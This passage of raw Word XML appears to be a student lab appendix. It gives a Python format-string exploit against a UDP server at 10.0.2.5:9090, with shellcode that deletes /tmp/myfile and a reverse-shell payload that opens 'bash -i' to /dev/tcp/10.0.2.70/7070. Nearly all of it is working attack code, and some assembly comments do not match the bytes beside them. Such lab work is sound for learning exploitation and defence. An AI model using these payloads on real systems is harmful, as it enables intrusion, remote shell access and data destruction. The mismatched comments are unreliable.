        <w:t xml:space="preserve">Appendix </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF8E89C" w14:textId="77777777" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ABCA7EB" w14:textId="388AE533" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>program for task6 and 7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1282C761" w14:textId="77777777" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="00E31857">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D11231" w14:textId="77777777" w:rsid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#!/usr/bin/python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7BF642" w14:textId="02E2C6FB" w:rsidR="008D1245" w:rsidRDefault="008D1245" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#format string task6&amp;task7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BBF07F" w14:textId="77777777" w:rsidR="00AF29F8" w:rsidRPr="003660CA" w:rsidRDefault="00AF29F8" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB3EBBE"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import struct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A67C14D"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import sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496F6251"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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511B91DF"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29B7E6B0"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def send_to_server(data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F19BD2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host = "10.0.2.5"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6979C15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port = 9090                   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFA96A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s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E721DB1"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s.connect((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEA02EB"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s.sendall(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7EAF5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s.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D195867"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20611919"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shellcode= (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480C97F8"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Push '/bin////bash' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262ECE4D"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"\x31\xc0"                              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAD253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"\x50"                                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497935CC"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"\x68""bash"                            # pushl "bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11C15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pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263294C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"\x68""/bin"                            # pushl "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8240EC"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"\x89\xe3"                              # movl %esp, %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0901AB81"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201D1A7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Push '-ccc' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178C9C8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"\x31\xc0"                              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085D85FE"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"\x50"                                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA156D"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"\x68""-ccc"                            # pushl "-ccc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D44BA42"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"\x89\xe0"                              # movl %esp, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA50A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10E4752E"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"\x31\xd2"</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277011C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"\x52"</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">        # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116684EA"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"\x68""ile "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2505D063"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"\x68""/myf"</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18357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"\x68""/tmp"</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC7E55B"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"\x68""/rm "</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B6A6B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"\x68""/bin"</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # pushl "/CTF"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57262EA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"\x89\xe2"</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">    # movl %esp,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED82EF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768E54A0"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Construct the argv[] array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D51866B"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "\x31\xc9"                              # xorl %ecx,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9EA04B"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"\x51"                                  # pushl %ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F784CE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"\x52"                                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652A9307"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"\x50"                                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D57695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"\x53"                                  # pushl %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D70AA0A"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"\x89\xe1"                              # movl %esp,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3637F20A"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1B4D2A2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Set edx to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A56B65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"\x31\xd2"                              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E0CD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295F3081"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Invoke the system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D498B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"\x31\xc0"                              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF33B68"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"\xb0\x0b"                              # movb $0x0b,%al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AF4F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"\xcd\x80"                              # int $0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3E4E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).encode('latin-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B00FE23"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4022293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reverseShell= ( </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79939B5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Push '/bin////bash' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB1E37"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"\x31\xc0"                  # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B82F41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"\x50"                          # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DA83C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"\x68""bash"                # pushl "bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFE1AF8"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pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D8657"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"\x68""/bin"                # pushl "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF7A72C"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"\x89\xe3"                  # movl %esp, %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD52E9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3F68DDAD"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Push '-ccc' into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350CFDA1"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"\x31\xc0"                  # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6AE3C7"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"\x50"                              # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B11E69"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"\x68""-ccc"                # pushl "-ccc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E8892C"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"\x89\xe0"                  # movl %esp, %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E32D88"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43569E5C"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Push command for reverse shell into stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D061519"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"\x31\xd2"              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D644C9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"\x52"                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDAA43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"\x68""2&gt;&amp;1"                # pushl "2&gt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA41F1"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 pushl "    "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3920BFB3"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"\x68""0&lt;&amp;1"                # pushl "0&lt;&amp;1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38670753"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 pushl "    "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6390D810"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 pushl "    "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BDC0A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 pushl "88  "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789443D1"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"\x68""070 "                # pushl "1/88"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFAACDF"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"\x68""29/7"                # pushl ".56."  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC6E24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"\x68""0.2."                # pushl ".168"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E34343"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"\x68""/10."                # pushl "/192"  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4698452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"\x68""/tcp"                # pushl "/tcp"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1742E"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"\x68""/dev"                # pushl "/dev"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF2FD72"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&gt;  "                # pushl " &gt;  "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF1FE77"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-i "                # pushl " -i "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BC0567"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"\x68""bash"                # pushl "bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0828290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                # pushl "////"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA6E2D"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"\x68""/bin"                # pushl "/bin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16216128"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"\x89\xe2"              # movl %esp,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199906D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1EA8084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Construct the argv[] array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5238AD"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"\x31\xc9"              # xorl %ecx,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00551720"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "\x51"                  # pushl %ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64C4AB"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"\x52"                  # pushl %edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D9CE1B"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"\x50"                  # pushl %eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4BEF3"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"\x53"                  # pushl %ebx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE1B49"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"\x89\xe1"              # movl %esp,%ecx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC9A36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788E5EC3"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Set edx to 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D64F7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"\x31\xd2"              # xorl %edx,%edx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B315A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11522220"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 Invoke the system call</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F3EE88"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"\x31\xc0"              # xorl %eax,%eax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2712A722"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"\xb0\x0b"                          # movb $0x0b,%al</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A2810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"\xcd\x80"                          # int $0x80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223C631A"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).encode('latin-1')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B29E76"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3C75C951"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#address of shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB907F7"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buf_high_addr = 0xbfff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E73498D"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77D97040" w14:textId="5C064989"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buf_low_addr = 0xf0d0 + </w:t>
      </w:r>
      <w:r w:rsidR="001A45A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0xa4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB432C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7B0CA29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#return address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC60113" w14:textId="32EE218D" w:rsidR="003660CA" w:rsidRPr="003660CA" w:rsidRDefault="00342D38" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">return_addr = 0xbffff090 - </w:t>
      </w:r>
      <w:r w:rsidR="00C249ED">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2412BC"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6BEFB88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#put return address in the head of the format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6686BAD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content = struct.pack("&lt;I", return_addr+2) + b'@@@@' + struct.pack("&lt;I", return_addr)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BA423D"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598BF53A"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#move the pointer to the buf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B8E7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for i in range(22):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A4F6EC"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content += b"%.8x."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA17C19"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1722A60C"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#calculate and construct the shellcode address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2748E178"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firstPart = b'%.' + bytes(str(buf_high_addr - 22 * 8 - 12 - 22), encoding='ascii') + b'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FE7A88"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0AAF8741"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secondPart = b'%.' + bytes(str(buf_low_addr - buf_high_addr - 1), encoding='ascii') + b'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE485E8"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7BF1DF15"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#add shellcode address in the format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0908259D"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content = content + firstPart + b"%hn" + secondPart + b"%hn"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1897AA9D"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0D7913D1" w14:textId="54DA33C4"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#add </w:t>
      </w:r>
      <w:r w:rsidR="00DF0BEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> NOP between format string and shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F9F70A" w14:textId="03A0C24C"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for i in range(</w:t>
      </w:r>
      <w:r w:rsidR="00A9563D">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28872ABA"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 xml:space="preserve">    content += b'\x90'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647EF138"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p>
    <w:p w14:paraId="74F8CE67"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#add shellcode in the end of the format string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08133630" w14:textId="76049B58"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content += shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> #shellcode for task6, </w:t>
      </w:r>
      <w:r w:rsidR="00D525E5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reverseS</w:t>
      </w:r>
      <w:r w:rsidR="00F76A7C">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>hell for task7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64129126" w14:textId="77777777" w:rsidR="003660CA" w:rsidRDefault="003660CA" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5F0DE8" w14:textId="2CA57013" w:rsidR="00073522" w:rsidRDefault="00073522" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>#write the message to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09580D39" w14:textId="77777777" w:rsidR="00073522" w:rsidRPr="00073522" w:rsidRDefault="00073522" w:rsidP="00073522">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073522">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file = open("badfile", "wb")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1200062C" w14:textId="77777777" w:rsidR="00073522" w:rsidRPr="00073522" w:rsidRDefault="00073522" w:rsidP="00073522">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073522">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file.write(content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21872E68" w14:textId="25F97DE2" w:rsidR="00073522" w:rsidRDefault="00073522" w:rsidP="00073522">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00073522">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>file.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0C217F" w14:textId="77777777" w:rsidR="00073522" w:rsidRPr="003660CA" w:rsidRDefault="00073522" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3757441C"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#send the message to the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DCAFD4" w14:textId="77777777" w:rsidR="003660CA" w:rsidRPr="003660CA" w:rsidRDefault="003660CA" w:rsidP="003660CA">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="393318"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003660CA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
